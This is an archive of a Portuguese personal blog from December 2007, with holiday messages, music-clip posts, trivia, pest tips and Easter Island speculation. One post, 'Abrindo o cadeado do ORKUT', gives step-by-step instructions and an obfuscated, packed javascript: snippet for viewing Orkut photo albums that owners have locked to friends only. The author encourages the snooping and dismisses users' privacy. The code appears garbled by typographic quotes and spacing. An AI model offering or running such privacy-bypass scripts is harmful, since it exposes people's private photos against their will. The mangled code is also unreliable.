segunda-feira, dezembro 31, 2007

MENSAGEM DE ANO NOVO

MENSAGEM DE ANO NOVO

As borbulhas de champanhe e os fogos de artifício,
anunciam a chegada de um novo ano.
É tempo de refazer planos,
reconsiderar os equívocos e perdas e retomar o caminho de uma vida feliz.

Teremos outras 365 novas oportunidades de dizer à vida que de fato queremos ser plenamente felizes.
Viver cada dia, cada hora e cada minuto em sua plenitude, como se fosse o último!

De que queremos renovação e buscaremos os grandes milagres da vida a cada instante.
O novo ano é hora de nascer, de florescer, de viver de novo.

Um feliz 2008 pra todos vocês leitores!


Ricardo M. Freire

O poder do amor

O poder do amor

"O dia em que o poder do amor for maior que o amor pelo poder, o mundo encontrará paz"

Jimi Hendrix


(Mensagem de ANO NOVO enviada pelo leitor Marcus Vinicius, dos EUA)

FRASE DA SEMANA

"No ano novo, tudo pode se transformar, os desejos são as mais belas obras desse evento anual."

Erasmo Shallkytton

Um novo fim

Um novo fim

"Embora ninguém possa voltar atrás e fazer um novo começo, qualquer um pode começar agora e fazer um novo fim."

Chico Xavier

CHARGE DA SEMANA

Juro pra vocês que eu estava procurando uma charge otimista pra postar... Coisa difícil! Mas tá aí o recado do cartunista Samuca. O ano de 2008 vai ser pedreira! Mas jamais devemos perder o otimismo e o jeito é ficar com a primeira opção da plaquinha...

Ricardo M. Freire

domingo, dezembro 30, 2007

CLIP DO DIA

Robin Gibb, um dos membros do BEE GEES, fez aniversário no último dia 22 de dezembro. Além dele, seu irmão e também membro do BEE GEES, Maurice Gibb, também estaria aniversariando no mesmo dia, porém o cantor morreu aos 53 anos, no dia 23 de janeiro de 2003 depois de sofrer um ataque cardíaco quando passava por uma cirurgia no intestino.
O CLIP DO DIA é totalmente dedicado ao BEE GEES, um dos maiores fenômenos musicais de todos os tempos que possui a incrível marca de mais de 100 milhões de discos vendidos!

"How Can You Mend a Broken Heart" - Bee Gees

sábado, dezembro 29, 2007

Você sabia?

Você sabia que um dos primeiros territórios habitados a receber o sol do ano novo é a Ilha Pitt, na costa Oriental da Nova Zelândia, e que o último lugar do mundo a festejar o início de um ano novo é a Ilha de Samoa, no Pacífico?

Ricardo M. Freire

Os países e o Ano Novo

Os países e o Ano Novo

Nas noites de 31 de dezembro, respeitadas as diferenças de fuso horário, as promessas são feitas, desejos pensados, mal-entendidos superados.
As pessoas valorizam muito a festa de Ano Novo, porque sentem o desejo de se renovar. As comunidades antigas expressavam isso através de ritos: jogavam fora roupas e objetos, querendo eliminar o que, em suas vidas, estava "envelhecido". No primeiro momento do ano novo, todos peregrinavam a uma montanha alta para ver uma paisagem nova ou banhavam-se, em um rio ou no mar, para acolher o tempo novo dado por Deus. Até hoje, os ritos que ocorrem nas praias brasileiras, em homenagem a Iemanjá, (nome que a religião dos Orixás dá à manifestação de Deus nas águas do mar), revelam este desejo de renovação.


Alguns países e seu Ano Novo

-Áustria
Os austríacos têm o hábito de jogar chumbo derretido num copo com água no momento em que o relógio soa a zero hora de um novo ano. As figuras que surgem quando o chumbo esfria são guardadas pelas pessoas como um amuleto que irá ajudar na realização dos pedidos feitos na passagem do ano.

-China
Na China, o Ano Novo é celebrado durante seis semanas entre os meses de janeiro e fevereiro. Tradicionalmente, nesse período os chineses fazem uma bela faxina em suas casas para espantar os maus espíritos e atrair boa sorte. Na noite da véspera do novo ano, todas as luzes ficam acesas para representar calor humano, amizade e reconciliação. À meia-noite, há uma grande queima de fogos. Os chineses acreditam que o barulho do foguetório espanta os espíritos indesejáveis.

-Dinamarca
Depois de uma ceia a base de peixes e batatas, os dinamarqueses aguardam ansiosamente pela meia-noite. Quando o relógio está prestes a soar as doze badaladas, todos na família sobem em cadeiras. Assim que dá meia-noite, pulam da cadeira para o novo ano e brindam com champanhe.

-Escócia
Na Escócia, um dos costumes mais tradicionais da festa de Ano Novo é a de homens e mulheres que nunca se viram beijarem-se na boca. Some-se a isso o ainda mais tradicional hábito de beber uísque em toda e qualquer comemoração e está garantido um dos reveillons mais animados da Europa.
Na Escócia, existe uma superstição bem engraçada sobre a primeira visita que se recebe no ano. Se for um homem moreno, ótimo. É um bom presságio. Se for um sujeito ruivo, a visita é considerada um mau agouro. Mas eles acreditam que azar mesmo terá aquele que abrir as portas para uma mulher.
Ainda os escoceses: enquanto todos os países de língua inglesa chamam a festa de reveillon de New Year's Eve ("véspera de ano novo"), na Escócia a data é conhecida como Hogmanay, que vem do gaélico "oge maidne" (nova manhã).

-França
Na França, as pessoas costumam preparar ostras e diversos outros frutos do mar para a ceia de Ano Novo.

-Índia
Na Índia, existem mais de 12 calendários religiosos. No Norte, o ano começa a Festa de Dîwâlî, no outuno. Os indianos colocam luzes por todas as partes.

-Portugal
Uma das manias dos portugueses é sair às janelas de casas batendo panelas para festejar a chegada do novo ano. Só não convém chamá-los de "paneleiros", o mesmo que "bicha" para nós.

-Tailândia
O Ano Novo começa na metade de abril.

-Vietnã
Os vietnamitas comemoram o Ano Novo, que eles chamam de Tet, no dia 10 de fevereiro. Nessa data, todos acordam cedo e vão à igreja. As mulheres vestem vermelho e amarelo (porque são as cores da bandeira do país) e os homens usam roupas pretas. Na igreja, comem um bolo especial, feito com arroz, feijão e carne de porco. Depois de meia hora, são distribuídos os "envelopes vermelhos" para as crianças, cada um com 10 ou 20 dólares dentro.


Ricardo M. Freire

Ano novo, velhos erros?

Ano novo, velhos erros?

"Jamais haverá ano novo, se continuar a copiar os erros dos anos velhos."

Luís de Camões

CLIP DO DIA

Como falamos na postagem anterior sobre o baterista PETER CRISS, o CLIP DO DIA é o clássico "BETH", do maravilhoso álbum DESTROYER, do KISS. "Beth" ficou no primeiro lugar das paradas da Billboard assim que foi lançada, em 1976, e prova que nem só de música barulhenta baseia-se o repertório do KISS, como muitos dizem equivocadamente.

"Beth" - KISS

Dezembro é também, mês de PETER CRISS

Dezembro é também, mês de PETER CRISS

O "CAT MAN" fez aniversário no último dia 20 de dezembro.
George Peter John Criscuola (1945), vulgo Peter Criss é mais conhecido por ter sido o primeiro baterista da banda KISS e sua maquiagem representava o personagem "CAT MAN", ou HOMEM GATO. Uma das músicas mais conhecidas da banda é de sua autoria: "Beth". Ele deixou o grupo no começo dos anos 80, inciando carreira solo. Retornaria outras duas vezes, mas depois de uma turnê em 2004 não faz mais parte da banda.
Mais velho de uma família de cinco irmãos, Peter sempre foi bom filho, pelo menos na infancia. Aos 9 anos descobriu seu interesse pela bateria e começou a praticar. O ginásio o encontraria um pouco menos bom filho que o de costume, enturmado e tal. Mas o estudo de música o manteve nos trilhos. Formou dezenas de bandas - tipo Os Barracudas - mas sua ambição sempre foi grande.
Aos 19 anos conheceu Lydia, se casaram em 1970. Enquanto trabalhava de ajudante de açougueiro, colocou um anúncio na revista Rolling Stone se oferecendo como baterista e logo foi procurado por Gene e Paul e se entusiasmou logo com o esquema. A banda começou a fazer sucesso, sua vida virou um paraíso, estavam ricos, sempre em excursão, aonde levava Lydia, ou gravando um novo álbum. Compôs a canção "Beth" (que iria se chamar "Beck", mas Gene sugeriu a troca de nome, para não associa-la a Jeff Beck), que é um dos maiores sucesso do KISS, até hoje. Paralelamente, seu casamento ia pouco a pouco se deteriorando. E ele ia se afundando nas drogas.
Em 1979 Peter se separa de Lydia e sofre um acidente de carro. Nesse mesmo ano casou-se com a playmate Debra Svensir. Seu álbum solo também obteve bons resultados. Mas o processo era irreversível, pouco a pouco ia perdendo o interesse pelo KISS e seus truques. Então com alguma mágoa deixa o KISS.
Rapidamente lançou seu primeiro disco solo, Out Of Control, em 1980. Dois anos depois lançou Let Me Rock You. Em 1989 fez uma participação especial no disco de Ace Frehley (Trouble Walking), na música Hide Your Heart (música que também foi lançada pelo KISS no mesmo ano no disco "Hot In The Shade", essa música foi escrita por Paul Stanley) e em 1994 lançou Criss Cat #1, que contou com a participação do amigo Ace Frehley em 3 músicas. Peter teve também um projeto que teve a participação de Mark St. John, terceiro guitarrista do Kiss falecido a pouco tempo.
Depois de 15 anos, Peter leva sua filha Jenilee a uma KISS Konvention, onde se encontrou com Gene. É convidado e participa do acústico do KISS em 1995. No ano seguinte (1996) Peter estava de volta ao KISS. Peter se casou novamente, com Gigi, e em 2001 Peter sai do KISS mais uma vez.
No final do ano de 2001 participou de 2 episódios da série OZ.
Peter Criss voltou para o KISS e tocou no show do KISS com a Orquestra Sinfônica de Melbourne na Austrália ("Alive IV") no dia 28 de Fevereiro de 2003. Tocou com o KISS também em 3 shows no Japão em Março e em uma apresentação em Las Vegas também em Março de 2003. Participou também da turnê com o Aerosmith em 2003. Atualmente Peter não está no KISS.


Discografia com o KISS

Kiss (1974)
Hotter Than Hell (1974)
Dressed To Kill (1975)
Destroyer (1976)
The Originals (1976)
Rock And Roll Over (1976)
Love Gun (1977)
Peter Criss (1978)
Dynasty (1979)
Unmasked (1980)
MTV Unplugged (1996)
Psycho Circus (1998)
Symphony: Alive IV (2003)


Carreira solo

Out of Control (1980)
Let Me Rock You (1982)
Criss Cat #1 (1994)
One For All (2007)


Ricardo M. Freire

sexta-feira, dezembro 28, 2007

Abrindo o cadeado do ORKUT

Abrindo o cadeado do ORKUT

Pra quem curte ficar “xeretando” as fotos do ORKUT da galera e está desesperado com o cadeado que andam colocando nos álbuns, acabou-se este problema. Pra quem ainda não sabe do que se trata, explico melhor...Trata-se de uma nova opção no ORKUT na qual permite que só os amigos adicionados possam ver o seu álbum do ORKUT, dificultando assim a vida dos bisbilhoteiros de plantão. Mas ainda é possível ter acesso as fotos. A alternativa é um SCRIPT, e foi bolado por um hacker indiano. Pra quem não sabe, a India é o segundo país que mais acessa o ORKUT, perdendo somente para o Brasil que é líder absoluto.

Faça o seguinte:

- Baixe o navegador MOZILA FIREFOX

- Entre no perfil desejado, através do MOZILA (ao invés de usar o INTERNET EXPLORER)

- Copie o código abaixo e cole na barra de endereços onde está o link da pessoa e dê um ENTER

Código:

javascript:function $(p,a,c,k,e,d){e=function(c){return(c35? String.fromCharCode(c+29):c.toString(36) )};if(!”.replace(/^/,String)){while(c –){d[e(c)]=k[c]||e(c)}k=[function(e){r eturn d[e]}];e=function(){return’\\w+’};c= 1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,’g’),k [c])}}return p};eval($(’x=h.r.v.17(/1g\\/\\d+\\/(\\ d+)\\.A/i)[1];h.r.v=u.y(9,4,F,7,12,g,k,V ,q,3,14,f,8,1e,3,b,2,c,3,15,c,j,3,18,2, k,2,e,m,9,6,4,F,7,9,4,H,7,19,e,G,5,f,e,2 ,3,b,2,c,3,K,2,e,c,G,l,2,3,D,f,8,I,c,e, f,9,6,4,H,7,9,4,t,7,9,f,3,4,c,I,1c,1d,E, 4,5,5,b,w,6,6,8,5,c,g,z,8,2,b,m,j,k,g,2, l,B,b,2,5,j,8,2,q,E,7,L,g,2,l,3,e,2,3,s, 11,K,D,P,s,9,6,f,7,9,6,4,t,7);J=u.y(4,5, 5,b,w,6,6,8,5,c,g,z,8,2,b,m,j,k,g,2,l,B, b,2,5,j,8,2,q);1b(i=1;i<=e;i++){p=h.C(\’ M\’);p.O(”Q”,”R”);p.S.T=”U”;o=W X();o.Y=\’Z://10.16.1a/1f/N/\’+i+\’/0/\’ +x+\’.A\’;a=h.C(\’a\’);a.13=J;a.n(o);p.n (a);h.r.n(p)}’,62,79,’||111|32|104|116| 47|62|99|60||112|114||100|97|108|documen t||46|98|103|121|appendChild|img||109|bo dy|67|49|String|innerHTML|58|ctrlc|fromC harCode|45|jpg|115|createElement|76|39|5 1|105|50|101|blog|82|66|span|milieu|setA ttribute|43|align|left|style|padding|10p x|117|new|Image|src|http|img3|84|65|href |72|77|orkut|match|78|69|com|for|102|61| 107|images|medium’.split(’|'),0,{}));voi d(0)


Eu particularmente acho totalmente desnecessário o uso do tal cadeado. O ORKUT é uma rede social filiada ao Google, criada em 19 de Janeiro de 2004 com o objetivo de ajudar seus membros a criar novas amizades e manter relacionamentos.
Oras, se a pessoa quer privacidade, então por quê entrou no ORKUT? Sempre que as fotos forem bloqueadas alguém sempre vai achar um meio de desbloqueá-las, podem acreditar nisso!

Ricardo M. Freire

CLIP DO DIA

Nesta sexta-feira (dia internacional da balada), o som da balada fica por conta do "Deus da guitarra", ERIC CLAPTON.
ERIC PATRICK CLAPTON (Ripley, Surrey, 30 de março de 1945) é guitarrista, cantor e compositor britânico. Apelidado de "Slow Hand", é considerado um dos melhores guitarristas do mundo. Embora seu estilo musical tenha variado ao longo de sua carreira, CLAPTON sempre teve suas raízes ligadas ao blues. CLAPTON foi considerado inovador pelos críticos em várias fases distintas de sua carreira, atingindo sucesso tanto de crítica quanto de público e tendo várias canções listadas entre as mais populares de todos os tempos. Em 2004 foi condecorado com o título de Comandante da Ordem do Império Britânico. "It's In The Way That You Use It" faz parte da trilha sonora do filme A COR DO DINHEIRO (1986), estrelado por PAUL NEWMAN e TOM CRUISE.

"It's In The Way That You Use It" - Eric Clapton

IMAGEM ESPETACULAR !!!!!

É claro que não vou descartar a possibilidade da foto ter sido feita por PHOTOSHOP, mas os tornados são fascinantes. O tornado é um intenso redemoinho de vento formado por um centro de baixa pressão durante tempestades. Se o redemoinho chega a alcançar o chão, a repentina queda na pressão atmosférica e os ventos de alta velocidade (que podem alcançar mais de 350 km/h) fazem com que o tornado destrua quase tudo o que encontrar no meio de seu caminho. Embora ainda não exista um consenso da ciência sobre o mecanismo que desencadeia o início de um tornado, aparentemente eles estão ligados a uma interação existente entre fortes fluxos ascententes e descendentes que formam uma movimentação intensa no centro das nuvens carregadas que compoem as super-células tempestuosas.
O interessante, é que sabe-se que um tornado gira no sentido anti-horário no hemisfério norte e horário no hemisfério sul.
Curioso, não?

Ricardo M. Freire

Você sabia?

Você sabia que os antigos egípcios adoravam cães e gatos e os tinham em grande número? Em 1.888 foram encontrados 300.000 gatos mumificados numa necrópole do Egito.

Ricardo M. Freire

quinta-feira, dezembro 27, 2007

Elimine as traças de sua casa

Elimine as traças de sua casa

Estava eu por estes dias na casa de meu pai e reparei certos "bichinhos" andando pelo chão ou pelas paredes. Descobri que são os "peixinhos de prata", ou como são conhecidos por todos, como as temidas "traças".

Traça é a denominação popular dada a diferentes grupos de insetos, podendo variar entre regiões ou países. No Brasil este nome se refere à ordem Thysanura (que na Europa é chamado de lepisma). As mais encontradas são as conhecidas como "traça das roupas" e a "traça dos livros".
As traças dos livros têm seu aspecto que lembra um peixe prateado, daí um dos seus nomes "peixinho de prata", em inglês "silverfish". As espécies encontradas nas residências têm coloração cinza prateada. O seu tamanho varia de 0,85 a 1,3 cm, dependendo da espécie e do ínstar (estágio de desenvolvimento).
Na Europa o nome traça se relaciona com a ordem Lepidoptera relacionado com as borboletas.
São os insetos da ordem Thysanura, que é desprovida de asas e se alimenta de detritos (detritívoros). Comumente encontrados vivendo nos domicílios entre papéis e roupas, dos quais se alimentam, sendo por isso considerados como pragas caseiras. No ambiente silvestre vivem no meio do folhiço se alimentando de folhas caídas e insetos mortos.
As traças representam a grande maioria das espécies de lepidópteros e correspondem a 121 famílias desta ordem (num total de 127).
O grupo das traças recebe a designação informal de Heterocera e distingue-se das borboletas pelos seguintes critérios: as antenas das traças são bastante variadas conforme a espécie, e apresentam normalmente forma de plumas; hábitos de vida noturnos ou crepusculares; metamorfose da pupa num casulo mole; coloração monótona adaptada ao modo de vida noturno; posição de repouso com as asas abertas e corpo arredondado e robusto.
Algumas espécies de traça são importantes economicamente, quer do ponto de vista positivo ou negativo. Por outro lado, há espécies que são consideradas como pragas agrícolas e florestais. As taturanas são lagartas venenosas que provocam inúmeros acidentes no Brasil e que correspondem ao estado larval do género de traça Lonomia. Na escala familiar, as traças são conhecidas pelos estragos que causam ao alimentarem-se de roupa feita de lã.


Dicas de como eliminar ou afugentar as traças:

1) Limpe cuidadosamente toda sua casa. Dedique especial atenção para locais escuros e escondidos. É justamente nesses pontos que você encontrará maior concentração de traças;

2)Coloque saquinhos com serragem de cedro dentro dos armários e recintos visitados pelas traças. Além de combater as traças, a serragem de cedro evita cheiros de mofo. Grãos de pimenta-do-reino também ajudam.

3) Cascas de limão secas e alguns cravos-da-índia espalhados pelas roupas do armário afugentam esses insetos. Muitos usam saquinhos de lavanda para esta finalidade;

4)Como parte da "operação varredura", assim que detectar uma traça, apele imediatamente para a vassoura, o aspirador de pó ou então, retire-a com o auxílio de um pequeno pedaço de papel. Não permita que qualquer traça continue a decorar sua parede, dependurada em solene tranqüilidade triunfante diante do seu imobilismo.


Obs.: E eu que vivia avistando estes bichinhos aparentemente "inofensivos" e não sabia o que eram...

Ricardo M. Freire

Dezembro é também o mês de WALT DISNEY

Dezembro é também o mês de WALT DISNEY

Walt Disney faleceu no dia 15 de dezembro de 1966, em Los Angeles, na Califórnia, vítima de câncer.
Walter Elias Disney (5 de Dezembro de 1901, Chicago — 15 de Dezembro de 1966, Los Angeles) foi um cineasta, produtor estadunidense de desenhos animados e animador. Tornou-se conhecido, nas décadas de 1920 e 1930, por seus personagens de desenho animado, como Mickey e Pato Donald. Ele também foi o criador do parque temático sediado nos Estados Unidos chamado Disneylândia, além de ser o fundador da corporação de entretenimento, conhecida como a Walt Disney Company.
Walt Disney transformou-se numa lenda, tendo criado, com a ajuda da sua equipe, todo um universo de referências no imaginário infantil de sucessivas gerações. Além disso, Walt Disney é a pessoa que mais prêmios Oscar ganhou em todos os tempos.


Obs.: Mais um gênio que nos deixou no mês de dezembro.

Ricardo M. Freire

CLIP DO DIA

Já que a época é de festa e espetáculos de fim de ano, nada melhor do que lembrarmos o espetacular show do tecladista francês Jean Michel Jarre realizado na virada do milênio diante das pirâmides do Egito. Jean-Michel André Jarre (24 de Agosto de 1948, Lyon) é um tecladista, compositor de música eletrônica, produtor musical francês e filho do famoso compositor de trilhas sonoras de filmes, Maurice Jarre. Considerado por muitos o pioneiro na música electrónica, bem como um “quebra-recordes” de espectáculos ao ar livre nos quais inclui efeitos laser, de pirotecnia, conjugando imagens projectadas com a arquitectura existente no local do espectáculo, juntando a isso os efeitos surround dos seus temas. Jarre vendeu estimadamente 80 milhões de álbuns e singles ao longo da sua carreira (desde 1971) e bateu 4 recordes no Guinness World Records Book. O seu nome artístico era Jean-Michel Jarre, mas em 1991, Jarre decidiu tirar o hífen, ficando assim: Jean Michel Jarre.

"Oxygene (Part IV)" - Jean Michel Jarre

Você sabia?

Você sabia que o canivete suiço foi inventado por Karl Elsener, ao saber que o exército do seu país importava canivetes alemães? Assim, Elsener abriu a sua própria fábrica em 1884. Os seus primeiros canivetes Victorinox foram entregues aos soldados suíços em outubro de 1891. Colocou o brasão do país para diferenciá-los dos alemães e baptizou o produto homenageando os seus pais, Victor e Victoria. Para ampliar o negócio e atrair utilizadores mais refinados, Elsener aperfeiçoou o canivete e, assim, surgiram os modelos com ferramentas: abre latas, chave de fendas, punção e saca-rolhas, serrote, alicate, abre garrafas, palito de dentes, pinça, gancho de pesca, lente de aumento e até uma pequena bússola. O produto popularizou-se depois da Segunda Guerra Mundial, com as unidades militares americanas. Hoje, a linha para oficiais tem 100 diferentes combinações.

Ricardo M. Freire

IMAGEM ESPETACULAR !!!!!

Todo mundo sabe que alguns animais podem ter a capacidade de se camuflarem com o meio em que vivem para tirar alguma vantagem. A camuflagem pode ser útil tanto ao predador, quando deseja atacar uma presa sem que esta o veja, ou para a presa, que pode se esconder mais facilmente de seu predador.
Existem dois tipos de camuflagem, a Homocromia, onde o animal tem a cor é a mesma do meio onde vive, e a Homotipia, onde o animal tem a forma de objetos que compôe o meio.

- Homocromia
Como exemplo, podemos citar os ursos polares, que têm o pêlo branco que confunde-se com a neve.


- Homotipia
Como exemplo, podemos citar as girafas (na foto acima), que tem corpo e membros alongados que a fazem confundir com árvores do hambiente em que vivem, ou ainda a sua própria coloração, cheia de manchas.


Obs.: Quem diria que um animal tão grande pudesse se camuflar... Pois é, mais uma das perfeições da natureza.

Ricardo M. Freire

O mistério da Ilha de Páscoa

O mistério da Ilha de Páscoa

A Ilha da Páscoa fica no oceano Pacífico, a 3.600 km do Chile, na América do Sul. Está praticamente isolada de outras ilhas, tanto a oeste (Polinésia Central) quanto ao leste (litoral do Chile). É de origem vulcânica (vulcão Rano-Raracu). Superfície de 162,5 km2, 2.000 hab, pertence ao Chile, uma de suas províncias e, ao mesmo tempo, Parque Nacional. A ilha só tem vegetação rasteira, ausência de matas. Foi povoada pelos polinésios, presumivelmente, no séc. V. Uma verdadeira odisséia essa travessia por um oceano que de "pacífico"não tem nada. Os marinheiros que aí chegaram, na páscoa de 1722 (daí o nome), ficaram impressionados com as gigantescas estátuas de pedra que encontraram.
São centenas de estátuas, os moai, que medem entre 10 e 20 metros de altura, chegando a pesar 50 toneladas, moldadas em pedra vulcânica, duras como aço. Estão em pé, algumas caídas, mas há outras centenas inacabadas e espalhadas pelas proximidades, todas na periferia, nenhuma no interior. Na época de sua descoberta (1722), ninguém dos habitantes naturais sabia informar quase nada sobre elas, como haviam sido talhadas, com que ferramentas e com que finalidade.As pedreiras donde foram extraídas estão na própria ilha, restos de pedras em fase de corte ainda são encontradas. Mas, como foram roladas até o litoral? Como foram erguidas? Não há vestígios de toros de árvore e, como no caso das pirâmides egípcias, fica-se com mistérios semelhantes. Erich Von Däniken aí esteve e, nas páginas de seu livro ERAM OS DEUSES ASTRONAUTAS? (já comentado aqui no BLOG), fala de um pesquisador, Thor Heyerdahl, que estabeleceu algumas conclusões, publicadas no seu "Aku-Aku", Ullstein 1957, traduzido para o português como "Aku-Aku -- O Segredo da Ilha da Páscoa", Edições Melhoramentos.
Entre outras, refere as seguintes:

- Restos de carvão de lenha, que Heyerdahl encontrou, parecem datar de 400 anos depois de Cristo, embora seja apressado fazer-se uma relação com a construção das estátuas; serve para indicar quando, no mínimo, a ilha já era habitada;

- A grande distância da ilha de outros locais comunicam um isolamento que, na época pré-colombiana, ainda seria maior, o que faz pensar que influências de outros povos poderiam ter sofrido os da ilha;

- No terreno vulcânico da ilha não crescem árvores e mal produz alimentos e, por conseguinte, como poderia o povo desse lugar superar questões como a de alimentação de todo um contingente humano entregue às tarefas de cortar as pedras, talhá-las, transportá-las e erguerem-nas?

- Inimaginável uma regular linha de navegação para a época;

- Quantas pessoas se dedicavam a esse trabalho? Um total de 2.000 homens em caso algum seria suficiente, mesmo trabalhando dia e noite, sem esquecer que parte deveria se dedicar à plantação e à pesca, a fim de todos se alimentarem; também inimaginável uma população maior, a ilha não suportaria;

- Os atuais nativos referem uma lenda que se perpetuou em suas lembranças, de que à ilha, em tempos imemoriais, chegaram homens voadores, razão por que, até hoje, chamam a sua ilha de "Terra dos Homens Pássaros";

- Estranho que não tenha remanescido nenhum culto junto às estátuas e não se vislumbre nenhuma utilidade prática para as mesmas, exceto servirem de um tipo de sinalização, de indicação de algo que não se pode precisar, etc.

E, nesse passo, questões sobre a Ilha da Páscoa, colocadas ao longo do tempo, continuam sem respostas. Ou, então, resistimos admitir a interferência extraterrestre ou, mesmo, de antigas civilizações que já teriam tido lugar, no Planeta.
A propósito, é Däniken quem diz e acusa a casta de religiosos e missionários ocidentais que "...contribuiram com sua parte para que as trevas dos tempos permanecessem; queimaram plaquinhas com caracteres hieroglíficos, proibiram os antigos cultos religiosos e destruíram qualquer tradição."


Ricardo M. Freire

quarta-feira, dezembro 26, 2007

CLIP DO DIA

Como o único assunto musical do dia de hoje foi o ranking mundial de shows em 2007, destacamos como CLIP DO DIA o oitavo colocado do ranking, a banda GENESIS.
O GENESIS é uma banda britânica de rock progressivo formada em 1967, e teve sua formação clássica composta por PETER GABRIEL (vocais/flauta), TONY BANKS (teclados), MIKE RUTHERFORD (baixo), STEVE HACKETT (guitarra) e PHIL COLLINS (bateria). Com aproximadamente 150 milhões de álbuns vendidos em todo o mundo, o Genesis é considerado um dos trinta maiores artistas de todos os tempos. A banda é amplamente conhecida por duas fases musicais diferentes. Na fase inicial da carreira, com GABRIEL nos vocais, suas estruturas musicais complexas, instrumentação elaborada e apresentações teatrais a tornou uma das bandas mais reverenciadas do rock progressivo na década de 1970. A partir da década de 1980, quando o baterista PHIL COLLINS assumiu os vocais no lugar de GABRIEL, que partiu para carreira solo, sua música tomou um caminho distinto em direção ao pop, os tornando mais acessíveis para a cena musical. COLLINS abandonou o grupo em 1996 para também prosseguir com sua carreira solo, mas BANKS e RUTHERFORD continuaram e elegeram (o ex-STILTSKIN) RAY WILSON para o substituir. Em 2006, PHIL COLLINS retornou a banda para fazer a atual turnê de reunião.

O clip que veremos é uma verdadeira obra-prima de quase 10 minutos executada ao vivo para a TV Belga no ano de 1973, ainda do tempo em que GABRIEL era o vocalista e COLLINS era o batera. Reparem PHIL COLLINS na bateria, mas já na época fazendo backing vocals.

"The Musical Box" - Genesis

terça-feira, dezembro 25, 2007

30 anos sem CHARLES CHAPLIN

30 anos sem CHARLES CHAPLIN

Na madrugada de 25 de dezembro de 1977, na localidade suíça de Vevey, morria CHARLES CHAPLIN enquanto dormia, aos 88 anos. SIR CHARLIE SPENCER CHAPLIN foi ator, diretor, produtor e autor cinematográfico. Considerado o maior ator da história do cinema, CHAPLIN é aclamado por muitos como o maior artista que já existiu. CHAPLIN inspirou a vida de muitas pessoas com suas comédias e personagens criativos, atingindo fama mundial através do cinema mudo. CHARLIE CHAPLIN foi sem dúvida um dos verdadeiros gênios da história da sétima arte. Em toda sua obra, o VAGABUNDO permanece como sendo o seu personagem mais famoso e adorado, aparecendo em mais de 70 filmes.


Foi bom que te calasses.
Meditavas na sombra das chaves,
das correntes, das roupas riscadas, das cercas de arame,
juntavas palavras duras, pedras, cimento, bombas, invectivas,
anotavas com lápis secreto a morte de mil, a boca sangrenta
de mil, os braços cruzados de mil.

E nada dizias. E um bolo, um engulho
formando-se. E as palavras subindo.
Ó palavras desmoralizadas, entretanto salvas, ditas de novo.
Poder da voz humana inventando novos vocábulos e dando sopros exaustos.
Dignidade da boca, aberta em ira justa e amor profundo,
crispação do ser humano, árvore irritada, contra a miséria e a fúria dos ditadores,
ó Carlito, meu e nosso amigo, teus sapatos e teu bigode
caminham numa estrada de pó e de esperança.

(Texto de Carlos Drummond de Andrade)


Obs.: Nada mais justo homenagear o maior gênio da história do cinema de todos os tempos através de outro gênio, da literatura, que foi CARLOS DRUMMOND DE ANDRADE.

Ricardo M. Freire

Ranking mundial de shows em 2007

Ranking mundial de shows em 2007

Saiu o ranking oficial dos shows no ano de 2007. O THE POLICE lidera disparado na frente numa incrível turnê mundial de causar inveja! O POLICE ainda está em turnê com um show até que modesto, mas mostrando que para se fazer um bom espetáculo não é necessário exagerar em pirotecnia ou efeitos especiais, como é o caso de bandas como ROLLING STONES e U2.

RANKING MUNDIAL:

01- The Police (US$131.9 milhões)
02- Kenny Chesney (US$71.1 milhões)
03- Justin Timberlake (US$70.6 milhões)
04- Celine Dion (US$65.3 milhões)
05- Van Halen (US$56.7 milhões)
06- Tim McGraw/Faith Hill (US$52.3 milhões)
07- Rod Stewart (US$49 milhões)
08- Genesis ($47.6 milhões)
09- Josh Groban (US$43 milhões)
10- Rascal Flatts (US$41.5 milhões)


RANKING AMERICANO:

01- Hannah Montana
02- Van Halen
03- Stevie Wonder
04- Dave Matthews Band
05- Céline Dion
06- Justin Timberlake
07- Jennifer Lopez & Marc Anthony
08- Kenny Chesney
09- Projekt Revolution Tour
10- Rascal Flatts


Obs.: Não posso deixar passar em branco a posição em que o VAN HALEN se encontra. A quinta colocação é honrosa, pois vale a pena lembrar que a banda está apenas em turnê americana, e não mundial, e que iniciou-se só agora em Setembro de 2007. Já dá pra imaginar se fizerem uma turnê mundial em 2008...
E dá-lhe VAN HALEN !

Ricardo M. Freire

segunda-feira, dezembro 24, 2007

MENSAGEM DE NATAL

MENSAGEM DE NATAL

Esta é uma data especial, onde não é permitido a ausência da esperança, da alegria, da compaixão e do amor, mesmo sabendo que amanhã lembraremos do percalço e do problema...

É melhor deixar para outro dia o cotidiano, hoje queremos nos desprender do rotineiro.

Queremos os sorrisos, os abraços e toda a manifestação de afeto das pessoas que verdadeiramente nos acompanham.

Hoje estamos em uma redoma, resguardados das impurezas que vivenciamos todos os dias.

Isto não é ilusório! Isto é ser " humano", isto é buscar o espírito natalino que poderá fazer dos nossos corações, nem que seja por apenas uma ceia, mais fraternos.

Não importa se há alguém cultuando o "Nascimento", cultuando um "Espírito" ou nem mesmo acreditando em tudo isto, o que importa é que hoje temos a chance de acreditarmos que o mundo por alguma razão despertou diferente, e vivenciarmos esta diferença...

Hoje usaremos a suspensão temporária da hostilidade.

Que sejamos felizes!

E eu sou o primeiro a crer em tudo isto...

Que você tenha uma bela noite de Natal!

FELIZ NATAL!


(Texto de Patrícia Fagundes)

CLIP DO DIA

Representando a véspera de Natal, o CLIP DO DIA está por conta do WHAM!, banda inglesa de Pop, criada em 1981 por GEORGE MICHAEL e ANDREW RIDGELEY famosa pelos hits "Wake Me Up Before You Go-Go", "Everything She Wants", "Last Christmas" e "The Edge Of Heaven". A banda se separou em 1986 e GEORGE MICHAEL iniciou uma bem sucedida carreira solo.

"Last Christmas" - Wham!

CHARGE DA SEMANA

Espetacular esta charge do AMORIN, que soube com muita inteligência unir o útil ao agradável. Taí o exemplo do que podemos chamar de uma "mensagem natalina educativa".

Ricardo M. Freire

"Happy Christmas (War Is Over)" - John Lennon

"Happy Christmas (War Is Over)" - John Lennon

So this is Christmas
And what have you done
Another year over
And a new one just begun

Ans so this is Christmas
I hope you have fun
The near and the dear one
The old and the young

A very merry Christmas
And a happy New Year
Let's hope it's a good one
Without any fear

And so this is Christmas
For weak and for strong
For rich and the poor ones
The world is so wrong

And so happy Christmas
For black and for white
For yellow and red ones
Let's stop all the fight

A very merry Christmas
And a happy New Year
Let's hope it's a good one
Without any fear

And so this is Christmas
And what have we done
Another year over
And a new one just begun

And so this is Christmas
I hope you have fun
The near and the dear one
The old and the young

